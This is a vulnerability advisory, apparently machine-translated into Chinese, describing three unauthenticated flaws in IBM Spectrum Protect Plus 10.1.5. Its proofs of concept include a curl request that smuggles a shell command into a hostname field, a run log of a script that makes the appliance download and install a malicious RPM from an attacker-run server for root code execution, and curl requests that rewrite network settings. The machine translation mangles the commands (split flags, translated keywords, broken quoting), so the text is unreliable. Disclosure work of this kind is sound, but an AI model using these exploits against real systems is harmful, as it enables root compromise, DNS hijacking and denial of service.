IBM频谱保护+多个漏洞

站得住脚的发现多个漏洞在IBM频谱保护+ (SPP) 10.1.5构建2204。

cve - 2020 - 4469:未经身份验证的命令注入

注意:这是一个不完整的修复cve - 2020 - 4211。

IBM SPP 10.1.5-2181后来试图解决这个漏洞single-quoting POST HTTP请求中提供的主机名参数设置小型设备的主机名。然而,它仍然是容易受到命令注入后CURL命令:

概念验证

curl ki - tlsv1.2 - h”x-ac-sessionid: abcd“- d”主机名= ";id > / tmp / cmd_injection echo '”“https://
               :8090 / emi / api /主机名”

一个未经身份验证的远程攻击者可以利用此漏洞与根特权运行任意命令。

cve - 2020 - 4470:管理控制台插件路径遍历未经身份验证的远端控制设备

路径遍历脆弱性存在于IBM SPP管理控制台管理控制台安装一个插件。一个未经身份验证的远程攻击者可以利用此漏洞上传任意文件的目录可写的管理员帐户。

在一个攻击的情况下,攻击者发送一个HTTP请求发送到目标请求从一个attacker-controlled URL下载RPM包。攻击者然后发送另一个HTTP请求安装RPM包上传。攻击者可以将RPM(即恶意内容。scriptlet)实现远程代码执行使用root特权。

概念验证

频谱保护PoC文件

附加是一个python脚本PoC和RPM包样本(攻击者- RPM - 1.0 - 0. - noarch.rpm),攻击者可以上传并安装。示例RPM将id命令的输出写入/ tmp /砍SPP设备。可以使用PoC如下:

python3 ibm_spp_file_upload_rce_cve - 2020 - 4470。py - t < target_host > - r攻击者- rpm - 1.0 - 0. - noarch.rpm

PoC启动一个本地httpd RPM。请确认运行PoC的用户权限绑定一个TCP端口8080(默认)

RPM规范(attacker-rpm.spec)文件用于生成攻击者- RPM - 1.0 - 0. - noarch。rpm也一并附呈。

下面显示了一个PoC的运行:

(root@host ibm) # python3 ibm_spp_file_upload_rce_cve - 2020 - 4470。py - t < target_host > - r攻击者- rpm - 1.0 - 0. - noarch.rpmStarting httpd on :8080 to serve attacker-rpm-1.0-0.noarch.rpm, DocumentRoot /work/ibm Requesting target  to download attacker-rpm-1.0-0.noarch.rpm from :8080 and save it to /tmp on   - - [19/Apr/2020 21:11:08] "GET /attacker-rpm-1.0-0.noarch.rpm HTTP/1.1" 200 - Installing /tmp/attacker-rpm-1.0-0.noarch.rpm on  {"commandoutput":{"errorCode":"0","commandOutput":"","commandErrorOutput":""}}

cve - 2020 - 4471:网络配置操作和设备重启

一个缺陷存在于IBM SPP管理控制台由于缺乏验证URL端点/ emi / api / netconfig。一个未经身份验证的远程攻击者可以获取和设置网络配置SPP设备通过发送一个精雕细琢的HTTP请求的端点。

概念验证

在一个攻击的情况下,攻击者首先发送一个GET请求到端点测当前网络配置:

旋度ki - tlsv1.2 - h x-ac-sessionid: abcd的https://
               :8090 / emi / api / netconfig“{”主机名”:“localhost”、“ip4prefix”:“22”,“ninterface”:“ens160”、“ip4address”:“xxx.xxx.xxx.xxx”、“ip4gateway”:“xxx.xxx.xxx.xxx”、“ip4dns”:“xxx.xxx.xxx。xxx, xxx.xxx.xxx.xxx”、“ip4domainsearch”:“some.search.domain”、“bootProtocol”:“dhcp”、“连接”:“ens160”}

攻击者发送一个POST请求相同的端点来改变网络配置:

curl ki - tlsv1.2 - h的x-ac-sessionid: abcd - h”application / json - type:“- d”{“主机名”:“localhost”、“ip4prefix”:“22”,“ninterface”:“ens160”、“ip4address”:“xxx.xxx.xxx.xxx”、“ip4gateway”:“xxx.xxx.xxx.xxx”、“ip4dns”:“xxx.xxx.xxx。xxx, xxx.xxx.xxx.xxx”、“ip4domainsearch changed.search“:”。域”、“bootProtocol”:“静态”、“连接”:“ens160”}“https://
               :8090 / emi / api / netconfig“HTTP / 1.1 200 OK服务器:Apache-Coyote / 1.1 X-Application-Context:用途:8090日期:星期一,2020年4月20日00:33:18 GMT - type: application / json; charset = utf - 8传输编码:分块{“commandoutput”:{“错误代码”:“0”,“commandoutput”:“所有验证通过/etc/sysconfig/network-scripts / ifcfg-ens160 \ n \ nSaving配置”,“commandErrorOutput”: "}}

处理端点的java代码执行一个python脚本,脚本更新网络配置和重新启动后的设备更新。

利用这个漏洞攻击的例子包括(但不限于)DNS劫持(通过改变DNS服务器)和DoS(重启设备)。